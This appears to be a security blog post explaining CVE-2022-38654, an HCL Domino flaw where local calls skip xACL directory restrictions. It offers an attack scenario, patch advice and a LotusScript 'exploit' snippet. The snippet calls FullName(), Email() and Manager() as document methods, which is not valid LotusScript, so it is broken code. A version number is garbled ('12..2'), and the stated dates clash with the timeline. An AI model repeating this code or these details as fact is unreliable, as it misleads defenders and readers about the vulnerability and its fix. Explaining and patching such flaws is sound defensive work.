CVE-2022-38654 - Exploiting HCL Domino’s xACL Information Disclosure Vulnerability

HCL Domino, formerly known as IBM Domino or Lotus Notes, is one of the corporate world’s most popular email, collaboration, and application servers. In September 2022, HCL released a security advisory for a critical information disclosure vulnerability identified as CVE-2022-38654. This flaw has wide-reaching implications for organizations still running Domino, opening the door to potential leaks of sensitive user information—even when strict database security measures are in place.

In this article, we break down what the flaw is, how it works, walk through some exploit concepts, and provide links to crucial references.

What is CVE-2022-38654?

CVE-2022-38654 is an information disclosure vulnerability. Specifically, in HCL Domino, certain local server calls may ignore directory read restrictions configured through xACL―the extended Access Control List mechanism that is meant to govern who can access particular records in the Domino directory.

This means that, even if xACL is set up to restrict access, an authenticated attacker with access to make specific internal API calls can retrieve user details that would otherwise remain hidden.

HCL advisory:
https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0097321

“xACL” – The Gatekeeper That Fumbled

xACL (Extended ACL) lets Domino administrators tightly control who can read or write information—down to precise user groups, roles, fields, and records. It is mainly used to protect directory data from unauthorized access.

For example, you could use an xACL rule to *hide* the “Manager” field of a user's person document from everyone except HR. In theory, any lookup on the Domino directory should respect these rules.

But with CVE-2022-38654, local server calls made by certain APIs or commands can *skip* xACL checks. The result: data you thought was locked away can be easily accessed by someone with authenticated server access.

Any user with at least some authenticated access

> This is an *authenticated* vulnerability. You still need a valid user session—anonymous or guest access will not work. But with even low-level valid access, an attacker can potentially query for information that should be hidden.

How Does the Exploit Work?

The exploit leverages a logic flaw in certain Domino APIs, such as LDAP, NRPC, or internal server calls, which do not always check for xACL permissions when running local searches.

Let’s look at a generic exploitation scenario

1. Attacker gets authenticated access, either as a regular user or via a lightly-privileged service account.
2. Using a script or direct API call, the attacker issues a “search” request to the Domino directory with crafted filters.
3. If the system is vulnerable, Domino returns user attributes—even if those fields are hidden by xACL rules.

Example Exploit Code

Below is a basic LotusScript snippet showing how an attacker might attempt to access restricted attributes of user records via an agent running on the server.

Sub Initialize
    Dim session As New NotesSession
    Dim db As NotesDatabase
    Dim directoryView As NotesView
    Dim personDoc As NotesDocument
    Dim searchString As String

    ' Open the Domino Directory
    Set db = session.GetDatabase("your_server_here", "names.nsf")

    ' Search for a user (ignoring xACL!)
    Set directoryView = db.GetView("People")
    searchString = "John Doe"
    Set personDoc = directoryView.GetDocumentByKey(searchString, True)

    If Not personDoc Is Nothing Then
        ' Reveals restricted fields!
        Print "Name: " & personDoc.FullName()
        Print "Email: " & personDoc.Email()
        Print "Manager: " & personDoc.Manager() ' May be restricted!
    End If
End Sub

> This script, when executed by a user with *any* authenticated access, may return fields that are protected under xACL. Even though the “Manager” field, for instance, is supposed to be hidden, the exploit allows it to be retrieved.

Imagine

- A disgruntled employee with basic Domino access writes a small script or uses standard Domino tools to enumerate user records.
- They retrieve attributes like home address, phone numbers, title, or custom HR fields—data no one outside of designated roles should see.

Fixes and Workarounds

HCL released a hotfix and subsequent update to patch CVE-2022-38654. The solution involves ensuring all local calls and APIs fully respect xACL permissions.

Upgrade your Domino server to the latest supported version.

Apply any available hotfixes immediately.

HCL patch guidance:
- HCL KB Article
- HCL Domino 12..2 FP2 - Security Update Details

Additional References

- US National Vulnerability Database: CVE-2022-38654
- HCL Domino Security Updates
- Understanding xACL Security

Summary

CVE-2022-38654 is a stark reminder that even trusted access control mechanisms can fail in complex enterprise software. If you rely on xACLs in your HCL Domino infrastructure, review your server versions, apply patches, and regularly audit who can see what—before an insider or determined attacker does.

Stay patched, stay secure.

*This guide is exclusive and designed for clarity. Please share and cite the original sources for best security practices.*

Timeline

Published on: 11/04/2022 21:15:00 UTC
Last modified on: 11/07/2022 17:15:00 UTC